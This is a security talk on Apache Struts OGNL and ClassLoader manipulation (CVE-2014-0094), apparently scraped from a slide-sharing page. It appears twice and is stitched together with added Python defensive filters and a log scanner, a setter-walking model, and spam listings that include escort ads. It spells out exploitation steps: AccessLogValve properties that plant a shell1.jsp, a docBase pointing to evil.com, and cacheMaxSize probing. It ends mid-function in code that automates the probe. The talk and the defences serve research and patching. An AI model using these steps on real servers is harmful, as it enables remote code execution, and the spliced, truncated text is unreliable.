Deep inside the Java framework Apache Struts

Julián Vilas

Whoami

•  Julián Vilas (Redsadic)
   – @julianvilas
•  Security Analyst & Researcher
  
¿Apache Struts?

Java framework
– for Java webapps
– Two major versions
  • Struts 1.x (EoL since 2013)
  • Struts 2.x
Why Struts?

•  (Mar 2014) CVE-2014-0094 goes public
•  What the hell was it?
   – Struts 2 vulnerability
   – Unauthenticated
   – All versions affected
   – Could lead to RCE
CVE-2014-0094

“ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulation”

•  Credits:
   –  Peter Magnusson
   –  Przemysław Celej
•  After reading it…
   –  Let’s learn some basics
OGNL

Object Graph Navigation Language

•  Expression Language for getting and setting properties of Java objects
   – Objects that are stored in the Context
OGNL

   #foo.dummy              // foo.getDummy()
   #bar.dummy              // bar.getDummy()
   dummy                   // qux.getDummy()
   dummy = “RootedCON”     // qux.setDummy(“RootedCON”)

   Context: foo, bar, baz, qux, …
   root (a stack, top = qux): qux, bar, foo, …

An expression starting with '#' looks the named object up in the Context; a bare property name is resolved against the root, starting from the top of the stack, which is why `dummy` ends up calling qux.getDummy().

Struts2 OGNL Context (ActionContext)

In Struts 2 the OGNL Context is the ActionContext and its root is the ValueStack.
Struts 2 request processing

User → http://struts.example.com/example/hello.action → Filter Dispatcher → Interceptors → Action → Result → HTML

Steps 1–7 on the diagram: the request for /example/hello.action enters the FilterDispatcher, passes through the Interceptor stack, reaches the Action, the Result is rendered, and the HTML travels back through the same chain to the user.

ParametersInterceptor

One of the interceptors in the stack of a Struts2 app is the ParametersInterceptor.
“This interceptor gets all parameters from ActionContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)”

“Because parameter names are effectively OGNL statements, it is important that security be taken into account”

http://struts.apache.org/release/2.0.x/struts2-core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html
ParametersInterceptor example

… HelloWorldAction … ActionContext / ValueStack

The diagram shows four steps: PUSH (the action is pushed onto the ValueStack), LOOKUP (the parameter name is looked up against the stack as an OGNL expression), SETTER (the matching setter is resolved) and SET (it is called with the parameter value).
Available methods

Methods that can be reached
– As seen, OGNL allows us to reference getters and setters

HelloWorldAction
   execute()
   getUsername()
   setUsername()
   … ?

   EXTENDS ActionSupport (ActionSupport methods)
   …
   getErrors()
   getTexts()
   getFieldErrors()
   getActionErrors()
   getActionMessages()
   getErrorMessages()
   …

   EXTENDS Object
   …
   getClass()
   …

HelloWorldAction extends ActionSupport, which, like every Java class, ultimately extends Object; getClass() is therefore reachable on any action, and from the returned Class the navigation can continue into the ClassLoader.
Navigating objects

•  Parameters are evaluated iteratively as an AST chain, composed of
   – A chain of getters (without parameters)
   – Ending with a setter (1 String, boolean or int parameter)
	
  
Looking for setters

•  Through object navigation, several setter methods that are not part of the Action can be reached
   –  What methods?
•  Post published by neobyte
   http://sec.baidu.com/index.php?research/detail/id/18
   1.  PoC for getting reachable setters
   2.  A method for getting RCE on Tomcat 8

DEMO

Struts Tester on Tomcat 6 / 7 & Tomcat 8

customized & commented version ready to use
https://github.com/julianvilas/rooted2k15
Exploitability

Tested against:

•  Tomcat 6 / 7 → RCE via “docBase” (win only)
•  Tomcat 8 → RCE via “AccessLogValve”
•  Glassfish 4 → RCE via “docBase” (win only)
•  Websphere 8.5 (developer) → RCE not found
•  Weblogic 10 & 12 → RCE not found
•  JBOSS 7.1 & 7.4 → RCE not found
What about Struts 1

•  According to CVE-2014-0114, Struts 1 is also vulnerable
•  Unpatched! (Struts 1 is past EoL, but is still in use)

•  Different reason: Struts 1 has no OGNL nor Value Stack
   –  The key: bean population with BeanUtils

•  You can find some Alvaro Muñoz (@pwntester) gold, like further explanation and a filter to be applied as a workaround, at
   –  http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z
   –  http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q
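A request-parameter guard of the kind the workaround filter linked above applies, written as an added Python example for this write-up (it is not the HP filter and not Struts' own excludeParams code; the segment pattern is this example's own). A parameter name is split into its navigation segments and refused if any segment is `class`, whatever its case and whether it is written as `a.class.b`, `a['class']` or the BeanUtils mapped form `a(class)`, so the name can never resolve to getClass() during bean population. Names are URL-decoded before the check so that an encoded `%63lass` does not slip past, and an optional allow-list of top-level property names gives the stricter posture of only populating what the form declares.

```python
"""Parameter-name guard against ClassLoader navigation. Constructed example
for this write-up; not the HP filter nor Struts' excludeParams."""
import re
from urllib.parse import parse_qsl

# Separators of OGNL and BeanUtils nested/indexed/mapped property syntax:
# dots, brackets, parentheses and quotes delimit the navigation segments.
_SEGMENT_SEPARATORS = re.compile(r"""[.\[\]()'"]+""")


def is_dangerous_name(name):
    """True when any segment of the name is "class" in any case, i.e. when
    the getter chain would pass through getClass()."""
    segments = [s for s in _SEGMENT_SEPARATORS.split(name) if s]
    return any(s.lower() == "class" for s in segments)


def filter_query(query, allowed=None):
    """Decode a raw query string and return (kept_pairs, rejected_names).

    Names navigating through "class" are always rejected. When `allowed`
    (a set of top-level property names) is given, anything whose first
    segment is not in it is rejected as well."""
    kept, rejected = [], []
    for name, value in parse_qsl(query, keep_blank_values=True):
        first_segment = _SEGMENT_SEPARATORS.split(name)[0]
        blocked_by_allowlist = allowed is not None and first_segment not in allowed
        if is_dangerous_name(name) or blocked_by_allowlist:
            rejected.append(name)          # worth logging: see the detection example later
        else:
            kept.append((name, value))
    return kept, rejected
```

Deny-listing `class` closes the path shown in this talk; the allow-list is the general answer, because the framework will otherwise happily walk any public getter chain the bean graph offers. Both belong in front of the populate step (a servlet filter in Struts 1, the interceptor's excludeParams/acceptParamNames in Struts 2), not after it.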
  
AccessLogValve exploitation

A log file with name shell1.jsp is created at webapps/ROOT. When requesting a nonexistent URL, it’s logged into the log file (which is going to be interpreted as a JSP when accessed).

   .directory=webapps/ROOT
   .prefix=shell
   .suffix=.jsp
   .fileDateFormat=1
DEMO

AccessLogValve exploitation

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb
docBase exploitation

•  “The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file).”
•  Legit application goes down

   .docBase=//evil.com/shared
About metasploit module

•  Tomcat 6/7 & GlassFish (docBase)
   – Only Win
   – Not landed yet in trunk but works fine
   – Matthew Hall (0x41414141) pull requests:
     https://github.com/rapid7/metasploit-framework/pull/3074
     https://github.com/rapid7/metasploit-framework/pull/3075
     https://github.com/rapid7/metasploit-framework/pull/3323
   – Same module as before, landed yesterday night

DEMO

docBase exploitation
I know Kung-fu

•  Now what?
Searching Struts sites

•  Dumb detection of Struts 2 sites
   – Default extension for Struts 2: “.action”
•  Also, when default configured, it accepts both “.action” and no extension

Searching Struts sites

•  Dumb detection of Struts 1 sites
   – Default extension for Struts 1: “.do”

https://web.archive.org/web/20060519001958/http://simonpeter.com/technology/java/struts/sites.html
Vulnerability checking

•  To check if a Struts 2 site is vulnerable, modify the “cacheMaxSize” property
   –  Integer.MAX_VALUE == 2147483647 (in x86)

•  Tomcat 6/7 & Glassfish
•  Tomcat 8

   Test values shown: 2147483647, 2147483648, AAAAAAAAA

Vulnerability checking

•  In Struts 1, if the conversion from String to Integer fails, a default value of 0 is set
•  But when trying to set a method that receives an Object with a String, an exception is raised

ROOTEDCON
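Log-side detection of the two signals the preceding slides give a defender (Struts-style endpoints recognised by extension, and parameter names that navigate through `class` towards getClass() and the ClassLoader), as an added Python example for this write-up that is not part of the talk. The access-log lines are constructed, the Tomcat-style common log format with a quoted request line is assumed, and the `x`/`y` segments stand for any continuation of the chain. Names are URL-decoded before the check, and the scanner reports the endpoint class as context rather than alerting on extensionless paths alone.

```python
"""Access-log scan for ClassLoader-navigation parameter names.
Constructed example for this write-up; sample log lines are made up."""
import re
from urllib.parse import parse_qsl, urlsplit

# Common log format with the request line in quotes (assumed layout).
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Constructed sample: one benign Struts 2 request, three probes from the same
# client against a .action, a .do and an extensionless endpoint, one REST call.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Mar/2015:10:12:01 +0100] "GET /example/hello.action?username=alice HTTP/1.1" 200 512
10.0.0.7 - - [05/Mar/2015:10:12:09 +0100] "GET /example/hello.action?class.classLoader.x.y=1 HTTP/1.1" 200 512
10.0.0.7 - - [05/Mar/2015:10:12:10 +0100] "GET /legacy/login.do?Class.classLoader.x=1 HTTP/1.1" 302 0
10.0.0.9 - - [05/Mar/2015:10:13:00 +0100] "GET /api/items HTTP/1.1" 200 2048
10.0.0.7 - - [05/Mar/2015:10:13:30 +0100] "GET /example/hello?%63lass.classLoader.x=1 HTTP/1.1" 200 512
"""

_SEPARATORS = re.compile(r"""[.\[\]()'"]+""")


def classify_endpoint(path):
    """Extension heuristic from the talk: ".action" -> Struts 2, ".do" ->
    Struts 1, no extension -> possibly Struts 2 with the default mapping."""
    last = path.rsplit("/", 1)[-1]
    if last.endswith(".action"):
        return "struts2"
    if last.endswith(".do"):
        return "struts1"
    if "." not in last:
        return "extensionless"
    return "other"


def dangerous_params(query):
    """Decoded parameter names containing a "class" segment (any case)."""
    names = []
    for name, _ in parse_qsl(query, keep_blank_values=True):
        if any(s.lower() == "class" for s in _SEPARATORS.split(name) if s):
            names.append(name)
    return names


def scan(log_text):
    """One finding per request whose parameter names navigate through
    getClass(): client, path, endpoint kind, HTTP status, offending names."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_LINE.match(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        bad = dangerous_params(url.query)
        if bad:
            findings.append({
                "ip": match.group("ip"),
                "path": url.path,
                "endpoint": classify_endpoint(url.path),
                "status": int(match.group("status")),
                "params": bad,
            })
    return findings


def suspicious_clients(findings):
    """Clients ranked by number of flagged requests."""
    counts = {}
    for finding in findings:
        counts[finding["ip"]] = counts.get(finding["ip"], 0) + 1
    return sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))
```

Access logs carry only the query string: parameter names sent in a POST body never reach them, so this catches probing and careless exploitation but is no substitute for refusing the names at request time and for patching. A 200 on a flagged request is the line to look at first; the server accepted the parameter, which is exactly what the cacheMaxSize check above relies on.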
  
OK I see, but…
Previous security bulletins

•  RCE, when form validation fails field values are interpreted as OGNL
•  RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL
•  RCE, bypass the '#'-usage protection built into the ParametersInterceptor to execute OGNL (S2-003 fix was incomplete)
•  RCE, user’s input is evaluated as OGNL when there’s a conversion error
•  Several RCE: via ExceptionDelegator (same as S2-007), CookieInterceptor (same idea as S2-003 and S2-005), etc.
•  RCE, incomplete fix for S2-003 and S2-005 on ParametersInterceptor

Previous security bulletins

•  RCE, incomplete fix for S2-003, S2-005 and S2-009 on ParametersInterceptor when using values for redirections
•  RCE, s:url and s:a tags, when "includeParams" is set, allow evaluating the values of request parameters as OGNL.
•  RCE, same as S2-013, incomplete fix.
•  RCE, actions using wildcards and Double OGNL evaluation allow OGNL injection
•  RCE: DefaultActionMapper short-circuit navigation interpreted as OGNL
•  RCE, what we saw in this presentation ☺ (ParametersInterceptor)
•  RCE, incomplete fix for S2-020
•  Incomplete fix for S2-020 and S2-021
Conclusions?

•  Seven years between S2-001 and S2-020
•  Same kind of vulnerabilities: injecting OGNL from user-supplied data
•  Several bypasses for fixes
•  Almost all RCE

•  Take your own…
Bonus track - Confluence

•  Is based on a WebWork fork (predating Struts 2)
•  If you look at their bulletins
   –  Versions up to and including 5.5.1 vulnerable to ClassLoader manipulation
      https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+2014-05-21
   –  Versions up to 5.6 (before 5.6.6 and 5.5.7) are vulnerable to double OGNL evaluation
      https://confluence.atlassian.com/display/DOC/Confluence+Security+Advisory+-+2015-01-21
•  Don’t they look familiar? ☺
Questions?

•  You can also ask:
   – Poke me around
   – by twitter: @julianvilas

Questions?

•  And what do you think about OGNL?

Thanks for attending!!! ☺

 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...gurkirankumar98700
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking MenDelhi Call girls
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Miguel Araújo
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 

Dernier (20)

Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
Kalyanpur ) Call Girls in Lucknow Finest Escorts Service 🍸 8923113531 🎰 Avail...
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men08448380779 Call Girls In Greater Kailash - I Women Seeking Men
08448380779 Call Girls In Greater Kailash - I Women Seeking Men
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 

Deep Dive into the Java Framework Apache Struts

• 1. Deep inside the Java framework Apache Struts
  Julián Vilas

• 2. Whoami
  – Julián Vilas (Redsadic), @julianvilas
  – Security Analyst & Researcher

• 3. ¿Apache Struts?
  – Java framework for Java webapps
  – Two major versions: Struts 1.x (EoL since 2013) and Struts 2.x

• 4. Why Struts?
  – (Mar 2014) CVE-2014-0094 goes public
  – What the hell was it? A Struts 2 vulnerability: unauthenticated, all versions affected, could lead to RCE

• 5. CVE-2014-0094
  “ParametersInterceptor allows access to 'class' parameter which is directly mapped to getClass() method and allows ClassLoader manipulation”
  – Credits: Peter Magnusson, Przemysław Celej
  – After reading it… let's learn some basics

• 6. OGNL
  Object Graph Navigation Language
  – Expression language for getting and setting properties of Java objects, the objects stored in the Context

• 7. OGNL
  #foo.dummy               // foo.getDummy()
  #bar.dummy               // bar.getDummy()
  dummy                    // qux.getDummy()
  dummy = "RootedCON"      // qux.setDummy("RootedCON")
  [Diagram: the Struts 2 OGNL Context (ActionContext) holds foo, bar, baz, qux, …; its root is the ValueStack (foo, bar, qux, …) with qux on top, so an unprefixed name is resolved against the stack and a #name against the context.]

• 8. Struts 2 request processing
  [Diagram, steps 1 to 7: the User requests http://struts.example.com/example/hello.action; inside the Struts 2 app the request goes FilterDispatcher → Interceptors (among them ParametersInterceptor) → Action → Result, and the HTML travels back to the User.]

• 9. ParametersInterceptor
  “This interceptor gets all parameters from ActionContext.getParameters() and sets them on the value stack by calling ValueStack.setValue(String, Object)”
  “Because parameter names are effectively OGNL statements, it is important that security be taken into account”
  http://struts.apache.org/release/2.0.x/struts2-core/apidocs/com/opensymphony/xwork2/interceptor/ParametersInterceptor.html

• 10. ParametersInterceptor example
  [Diagram: HelloWorldAction is pushed onto the ValueStack (PUSH); for each request parameter the interceptor looks the property up on the stack (LOOKUP), finds its setter (SETTER) and calls it (SET).]

• 12–16. Available methods (built up across slides 12, 14 and 16)
  Methods that can be reached: as seen, OGNL allows us to reference getters and setters
  – HelloWorldAction: execute(), getUsername(), setUsername()
  – extends ActionSupport: getErrors(), getTexts(), getFieldErrors(), getActionErrors(), getActionMessages(), getErrorMessages(), …
  – extends Object: getClass(), …

• 17. Navigating objects
  – Parameters are evaluated iteratively as an AST chain, composed of a chain of getters (without parameters) ending with a setter (one String, boolean or int parameter)

• 18. Looking for setters
  – Through object navigation, several setter methods that are not part of the Action can be reached
  – What methods? See the post published by neobyte: http://sec.baidu.com/index.php?research/detail/id/18
    1. PoC for getting reachable setters
    2. A method for getting RCE on Tomcat 8
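The following is an added example, not code from the deck: a Python model of what slides 7 to 9 and 17 to 18 describe. A request parameter name is treated as an OGNL chain of zero-argument getters ending in a one-argument setter and is resolved against a value stack with the action on top; reachable_setters() then enumerates every such chain from a root object, which is what a reachable-setters PoC does with Java reflection. The object graph is constructed for the example and is neither Tomcat's nor Struts'; the Java bean convention getFoo()/setFoo() is written as get_foo/set_foo.

```python
import re
from collections import deque

# Only plain dotted names are accepted here; '#' (context access) and
# brackets are rejected, in the spirit of the interceptor's acceptParamNames
# check that the bulletins call the "'#'-usage protection".
PARAM_NAME = re.compile(r"[A-Za-z_][A-Za-z0-9_]*(\.[A-Za-z_][A-Za-z0-9_]*)*")

PRIMITIVES = (str, bytes, int, float, bool, type(None))


class ParameterError(Exception):
    """Rejected name, or a getter/setter in the chain does not exist."""


def set_parameter(stack, name, value):
    """Model of ValueStack.setValue(name, value).

    The first property is looked up on the stack objects from the top down
    (the action is on top); the rest of the chain walks zero-argument getters
    and the last segment is written through its one-argument setter.
    """
    if not PARAM_NAME.fullmatch(name):
        raise ParameterError("rejected parameter name: " + name)
    *getters, last = name.split(".")
    first = getters[0] if getters else last
    kind = "get_" if getters else "set_"
    obj = next((o for o in stack if hasattr(o, kind + first)), None)
    if obj is None:
        raise ParameterError("nothing on the value stack has " + kind + first)
    for prop in getters:
        getter = getattr(obj, "get_" + prop, None)
        if getter is None:
            raise ParameterError("no getter for " + prop)
        obj = getter()
    setter = getattr(obj, "set_" + last, None)
    if setter is None:
        raise ParameterError("no setter for " + last)
    setter(value)


def reachable_setters(root, max_depth=6):
    """Breadth-first walk over zero-argument getters, collecting the dotted
    path of every one-argument setter, as a reachable-setters PoC does with
    reflection. `seen` stops cycles (a child whose getter returns its parent)
    and max_depth bounds how long a chain may get."""
    found, seen = [], {id(root)}
    queue = deque([(root, "")])
    while queue:
        obj, path = queue.popleft()
        for attr in sorted(dir(obj)):
            if attr.startswith("set_"):
                found.append(path + attr[4:])
            elif attr.startswith("get_") and path.count(".") < max_depth:
                child = getattr(obj, attr)()
                if isinstance(child, PRIMITIVES) or id(child) in seen:
                    continue
                seen.add(id(child))
                queue.append((child, path + attr[4:] + "."))
    return found


# Constructed toy graph: an action, its class object, a loader, and an
# object with an int setter hanging off the loader. Not Tomcat's classes.
class Resources:
    def __init__(self):
        self.cache_max_size = 0

    def set_cacheMaxSize(self, size):
        self.cache_max_size = int(size)   # the real setter takes a Java int


class Loader:
    def __init__(self):
        self.resources = Resources()

    def get_resources(self):
        return self.resources


class Klass:
    def __init__(self, loader):
        self.loader = loader

    def get_classLoader(self):
        return self.loader


class HelloWorldAction:
    def __init__(self, loader):
        self.username = ""
        self.klass = Klass(loader)

    def execute(self):
        return "success"

    def get_username(self):
        return self.username

    def set_username(self, username):
        self.username = username

    def get_class(self):   # every Java object has getClass(): the 'class' parameter
        return self.klass


def demo():
    """Set a legitimate parameter and a 'class.' chain, then list what an
    attacker could have reached from the action."""
    loader = Loader()
    action = HelloWorldAction(loader)
    stack = [action]   # value stack with the action on top
    set_parameter(stack, "username", "alice")
    set_parameter(stack, "class.classLoader.resources.cacheMaxSize", "2147483647")
    return action.username, loader.resources.cache_max_size, reachable_setters(action)
```

The point of the walk is the last element of demo()'s result: a setter that has nothing to do with the action is reachable with a parameter name that the accept pattern lets through, because getClass() is a getter like any other.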
• 19. DEMO
  Struts Tester on Tomcat 6/7 & Tomcat 8
  Customized & commented version ready to use: https://github.com/julianvilas/rooted2k15

• 20. Exploitability
  Tested against:
  – Tomcat 6/7 → RCE via “docBase” (Windows only)
  – Tomcat 8 → RCE via “AccessLogValve”
  – GlassFish 4 → RCE via “docBase” (Windows only)
  – WebSphere 8.5 (developer) → RCE not found
  – WebLogic 10 & 12 → RCE not found
  – JBoss 7.1 & 7.4 → RCE not found

• 21. What about Struts 1
  – According to CVE-2014-0114, Struts 1 is also vulnerable
  – Unpatched! (Struts 1 is past EoL, but is still in use)
  – Different reason: Struts 1 has neither OGNL nor a ValueStack. The key: bean population with BeanUtils
  – You can find some Alvaro Muñoz (@pwntester) gold, like further explanation and a filter to be applied as a workaround, at
    http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Protect-your-Struts1-applications/ba-p/6463188#.VBMB0i5_s0z
    http://h30499.www3.hp.com/t5/HP-Security-Research-Blog/Update-your-Struts-1-ClassLoader-manipulation-filters/ba-p/6639204#.VOsFG7CG_8Q

• 22. AccessLogValve exploitation
  1. .directory=webapps/ROOT
  2. .prefix=shell
  3. .suffix=.jsp
  4. .fileDateFormat=1
  A log file named shell1.jsp is created at webapps/ROOT. When a nonexistent URL is requested, the request is logged into that file, which is interpreted as a JSP when it is accessed.

• 23. DEMO
  AccessLogValve exploitation
  https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/struts_code_exec_classloader.rb

• 24. docBase exploitation
  – “The Document Base (also known as the Context Root) directory for this web application, or the pathname to the web application archive file (if this web application is being executed directly from the WAR file).”
  – The legit application goes down
  .docBase=//evil.com/shared

• 25. About the Metasploit module
  – Tomcat 6/7 & GlassFish (docBase)
    – Windows only
    – Not landed in trunk yet, but works fine
    – Matthew Hall (0x41414141) pull requests:
      https://github.com/rapid7/metasploit-framework/pull/3074
      https://github.com/rapid7/metasploit-framework/pull/3075
      https://github.com/rapid7/metasploit-framework/pull/3323
  – Same module as before, landed yesterday night

• 27. I know Kung-fu
  – Now what?

• 28. Searching Struts sites
  – Dumb detection of Struts 2 sites: the default extension for Struts 2 is “.action”
  – Also, with the default configuration, it accepts both “.action” and no extension

• 31. Searching Struts sites
  – Dumb detection of Struts 1 sites: the default extension for Struts 1 is “.do”

• 32. Searching Struts sites
  https://web.archive.org/web/20060519001958/http://simonpeter.com/technology/java/struts/sites.html

• 33. Vulnerability checking
  – To check whether a Struts 2 site is vulnerable, modify the “cacheMaxSize” property
  – Integer.MAX_VALUE == 2147483647 (a Java int is 32-bit on every platform, not only on x86)
  – Values tried: 2147483647, 2147483648 (one past MAX_VALUE) and AAAAAAAAA (not a number), against Tomcat 6/7 & GlassFish and against Tomcat 8 [screenshots]

• 34. Vulnerability checking
  – In Struts 1, if the String to Integer conversion fails, a default value of 0 is set
  – But when a String is used to set a property whose setter takes an Object, an exception is raised [screenshot, probe value ROOTEDCON]
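Added example, not the deck's code and not the Struts Tester or the Metasploit module: the differential check of slide 33 and the four AccessLogValve steps of slide 22, written in Python against a pluggable send(method, path, params) so that it runs offline. The getter chain that reaches the target object is passed in as `chain` and is not filled in here: the deck elides it and it differs by container and version. FakeServer is constructed for the test and imitates only the behaviour the check relies on.

```python
import re

INT_MAX = 2**31 - 1   # java.lang.Integer.MAX_VALUE; a Java int is 32-bit everywhere


def setter_params(chain, **props):
    """Turn bean properties into ParametersInterceptor parameter names:
    chain 'a.b' with directory='x' becomes {'a.b.directory': 'x'}."""
    return {f"{chain}.{name}": str(value) for name, value in props.items()}


def probe_int_setter(send, action_path, param):
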